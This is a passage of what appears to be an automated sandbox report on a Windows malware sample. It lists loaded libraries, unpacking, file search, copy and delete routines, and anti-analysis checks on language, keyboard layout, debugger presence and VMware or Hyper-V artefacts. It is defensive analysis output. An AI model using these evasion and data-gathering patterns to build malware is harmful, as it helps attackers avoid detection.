                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeUnpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jozizud:R;.raxup:R;.maweb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeUnpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: section name: .jozizud
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: section name: .raxup
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: section name: .maweb
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00757876 push eax; ret 0_2_00757894
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00758C2E push ds; retf 0_2_00758CC7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_007548A7 push 7DD07DC0h; iretd 0_2_007548B8
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00757885 push eax; ret 0_2_00757894
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00753DA1 pushfd ; iretd 0_2_00753DA4
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022BB29C push ecx; ret 0_2_022BB2AF
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26379
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeEvaded block: after key decisiongraph_0-27537
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI coverage: 6.9 %
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022AE697
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022B3B17
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022B4B77
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022AEF87
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022B47D7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022AE077
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022ADCE7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AF8F1 FindFirstFileA,0_2_022AF8F1
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022AC0D7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022A1937
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022B4107
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022AF917
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.0000000000799000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26364
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26367
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26383
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26378
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26407
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26206
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-27794
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAPI call chain: ExitProcess graph end nodegraph_0-26251
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00752B77 push dword ptr fs:[00000030h]0_2_00752B77
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A092B mov eax, dword ptr fs:[00000030h]0_2_022A092B
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B99B7 mov eax, dword ptr fs:[00000030h]0_2_022B99B7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A0D90 mov eax, dword ptr fs:[00000030h]0_2_022A0D90
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022BAFAF
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022BD151 SetUnhandledExceptionFilter,0_2_022BD151
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022BB5A1
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022B9867
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022B7DF7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
